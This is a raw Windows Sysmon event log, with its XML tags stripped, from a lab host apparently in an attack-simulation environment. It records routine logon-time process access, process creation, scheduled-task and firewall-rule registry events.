13:29:56.217{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000009952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT10532021-01-14 13:29:56.201{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask2021-01-14 13:29:56.201 10341000x80000000000000009951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.201{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.185{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.185{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.123{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.123{08A6967A-4753-6000-1505-000000009A01}37924748C:\Windows\system32\userinit.exe{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+23e5|C:\Windows\system32\userinit.exe+346e|C:\Windows\system32\userinit.exe+3725|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.055{08A6967A-4754-6000-1605-000000009A01}4340C:\Windows\explorer.exe10.0.14393.3866 (rs1_release.200805-1327)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=DF4B969F42D13259C3B264C99D1C0B2A,SHA256=C01D2AF406D43E1331DA921CC35AA52324C57FA6D7FA906732CA2B95515972C3,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 10341000x80000000000000009940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.076{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4754-6000-1A05-000000009A01}28844056C:\Windows\system32\svchost.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+21b54|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+2a21d|c:\windows\system32\appxdeploymentserver.dll+15697f|c:\windows\system32\appxdeploymentserver.dll+ae504|c:\windows\system32\appxdeploymentserver.dll+92924|c:\windows\system32\appxdeploymentserver.dll+19e0c|c:\windows\system32\appxdeploymentserver.dll+2bffd|c:\windows\system32\appxdeploymentserver.dll+2bdf9|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.983{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\System32\rundll32.exe10.0.14393.0 (rs1_release.160715-1616)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=C7645D43451C6D94D87F4D07BDE59C89,SHA256=495BBA47FC43EE23054FCD419F2F00457162D1C04296900C6AEA551102A810F3,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 13241300x800000000000000010163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.967{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|B=C:\Windows\system32\wwahost.exe|M=microsoft.windows.cloudexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.967{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{39943FFE-0825-47ED-9BAC-9AC127AB7A1E}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.967{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9869EDEC-4A65-41BC-B0E1-14594554FC6B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{559F3B84-0759-4F12-AB00-893FCBB781F6}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{2272B69D-B0BE-4BD2-B3A6-B514B606D751}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x800000000000000010158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 